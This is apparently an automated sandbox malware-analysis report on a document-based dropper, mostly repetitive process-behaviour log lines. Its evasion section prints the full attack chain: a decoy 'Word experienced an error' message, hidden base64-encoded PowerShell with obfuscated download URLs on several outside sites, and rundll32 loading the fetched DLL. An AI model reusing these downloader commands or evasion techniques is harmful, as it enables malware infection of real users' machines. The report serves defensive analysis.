Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2588

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: rundll32.exe, 00000008.00000002.2183555310.0000000000660000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 24_2_10004560 LoadLibraryA,GetProcAddress,AddFontResourceW,

24_2_10004560

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10001D4D mov eax, dword ptr fs:[00000030h]

7_2_10001D4D

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Memory protected: page execute read | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found

Source: unknown	Process created: Base64 decoded seT-VarIable ('G'+'Hp') ([tYPe]("{3}{2}{5}{4}{6}{1}{0}"-f 'Y','TOR','Y','S','Ir','stem.Io.d','EC') ) ; $Xo37t = [TYpE]("{2}{3}{1}{0}{4}"-f'NtMAnaGe','m.nEt.SERVICePoi','sYsT','e','R'); $Mpdyr_1=$N5_G + [char](33) + $H92K;$G85V=('P'+('5'+'7B')); ( iTeM ('VA'+'RiabL'+'e:GHP')).vAlue::"CRE`At`ED`irECtOry"($HOME + (('{0}O3pp1b'+'5{'+'0}'+('Y84vhd'+'h')+'{0}') -F [CHar]92));$C46R=('B4'+'1K'); ( dir vaRIaBlE:XO37t ).ValUe::"SeCUrIt`yProto`C`oL" = (('T'+'ls1')+'2');$I53H=(('C1'+'5')+'E');$Pf_wys3 = (('A'+'41')+'O');$E42T=(('D7'+'1')+'H');$I3z2csr=$HOME+((('FZoO'+'3'+'pp1')+('b5FZ'+'oY8'+'4vh')+'d'+'h'+('FZ'+'o'))."rEP`L`ACE"(('F'+'Zo'),[STRinG][chAr]92))+$Pf_wys3+'.d' + 'll';$E04E=(('Z'+'99')+'Q');$S84h9hn='h' + 'tt' + 'p';$Fouo1h1=(('x '+'['+' sh b'+'://u')+('ag'+'r')+'it'+'ec'+'h'+('.'+'co')+('m'+'/c'+'gi-b')+'i'+('n/'+'a5G'+'/!x')+' ['+(' '+'sh'+' '+'b://'+'www.91y')+('uda'+'o'+'.co')+('m/wp'+'-'+'ad')+('min/'+'KKH'+'t')+('1/!x ['+' '+'sh b'+':/')+'/'+('yo'+'urc')+('leanersur'+'fa'+'ce'+'s')+('.com'+'/')+('fo'+'ur-')+('m'+'on'+'ks-acasz/O')+'2m'+'y'+('/!x '+'[')+' s'+('h'+' b:'+'/'+'/layman')+('co'+'d')+'er'+'.c'+'o'+('m/'+'r')+('ustic-dec'+'o'+'r')+('-1g'+'b'+'ad/Us/!x [ ')+('sh '+'bs://'+'rb'+'d')+'ck'+'.'+('c'+'om/')+('wp-c'+'ont')+('en'+'t')+('/u'+'ploads/suc'+'u'+'ri/le'+'wf')+('K/!'+'x ')+'[ '+'sh'+' b'+'s'+':/'+('/fifa'+'coi'+'nsbo'+'x.c')+('o'+'m/w')+('p-'+'c')+('o'+'nt'+'ent/7gY')+('t/!'+'x ')+('['+' sh '+'b'+'://seama')+'rt'+('.i'+'nf')+'o'+('/a'+'
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded seT-VarIable ('G'+'Hp') ([tYPe]("{3}{2}{5}{4}{6}{1}{0}"-f 'Y','TOR','Y','S','Ir','stem.Io.d','EC') ) ; $Xo37t = [TYpE]("{2}{3}{1}{0}{4}"-f'NtMAnaGe','m.nEt.SERVICePoi','sYsT','e','R'); $Mpdyr_1=$N5_G + [char](33) + $H92K;$G85V=('P'+('5'+'7B')); ( iTeM ('VA'+'RiabL'+'e:GHP')).vAlue::"CRE`At`ED`irECtOry"($HOME + (('{0}O3pp1b'+'5{'+'0}'+('Y84vhd'+'h')+'{0}') -F [CHar]92));$C46R=('B4'+'1K'); ( dir vaRIaBlE:XO37t ).ValUe::"SeCUrIt`yProto`C`oL" = (('T'+'ls1')+'2');$I53H=(('C1'+'5')+'E');$Pf_wys3 = (('A'+'41')+'O');$E42T=(('D7'+'1')+'H');$I3z2csr=$HOME+((('FZoO'+'3'+'pp1')+('b5FZ'+'oY8'+'4vh')+'d'+'h'+('FZ'+'o'))."rEP`L`ACE"(('F'+'Zo'),[STRinG][chAr]92))+$Pf_wys3+'.d' + 'll';$E04E=(('Z'+'99')+'Q');$S84h9hn='h' + 'tt' + 'p';$Fouo1h1=(('x '+'['+' sh b'+'://u')+('ag'+'r')+'it'+'ec'+'h'+('.'+'co')+('m'+'/c'+'gi-b')+'i'+('n/'+'a5G'+'/!x')+' ['+(' '+'sh'+' '+'b://'+'www.91y')+('uda'+'o'+'.co')+('m/wp'+'-'+'ad')+('min/'+'KKH'+'t')+('1/!x ['+' '+'sh b'+':/')+'/'+('yo'+'urc')+('leanersur'+'fa'+'ce'+'s')+('.com'+'/')+('fo'+'ur-')+('m'+'on'+'ks-acasz/O')+'2m'+'y'+('/!x '+'[')+' s'+('h'+' b:'+'/'+'/layman')+('co'+'d')+'er'+'.c'+'o'+('m/'+'r')+('ustic-dec'+'o'+'r')+('-1g'+'b'+'ad/Us/!x [ ')+('sh '+'bs://'+'rb'+'d')+'ck'+'.'+('c'+'om/')+('wp-c'+'ont')+('en'+'t')+('/u'+'ploads/suc'+'u'+'ri/le'+'wf')+('K/!'+'x ')+'[ '+'sh'+' b'+'s'+':/'+('/fifa'+'coi'+'nsbo'+'x.c')+('o'+'m/w')+('p-'+'c')+('o'+'nt'+'ent/7gY')+('t/!'+'x ')+('['+' sh '+'b'+'://seama')+'rt'+('.i'+'nf')+'o'+('/a'+'			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMAegAvAE8AJwApACsAJwAyAG0AJwArACcAeQAnACsAKAAnAC8AIQB4ACAAJwArACcAWwAnAC	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',YbeYBwKPvEN	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',kkHcNcnl	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',kIWFufWNhCJ	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',jKmVZCpuSZSXyAJ	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',LFytx	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',MAwEWTVYSMc
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',jvGjlVYmjUQdf
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',ymrQU
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',#1

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcA